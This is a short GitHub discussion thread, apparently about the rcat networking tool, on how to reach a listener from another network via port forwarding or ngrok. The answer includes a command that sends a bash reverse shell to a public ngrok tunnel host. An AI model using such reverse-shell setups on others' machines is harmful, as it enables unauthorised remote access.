-
How would I make someone connect to my listener from another network? |
Beta Was this translation helpful? Give feedback.
Answered by
robiot
Nov 11, 2021
Replies: 1 comment
-
You could port-forward your network normally or use ngrok (Recommended). With ngrok:
|
Beta Was this translation helpful? Give feedback.
0 replies
Answer selected by
robiot
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You could port-forward your network normally or use ngrok (Recommended).
With ngrok:
rcat -lHp 5555
ngrok tcp 5555
where 5555 was the port you specified. This will create a tunnel from your computer to their servers which allows connections from other computers.Forwarding tcp://1.tcp.ngrok.io:12711 -> localhost:5555
. The 1.tcp.ngrok.io is the host and the numbers after is the port.rcat -r bash 1.tcp.ngrok.io 12711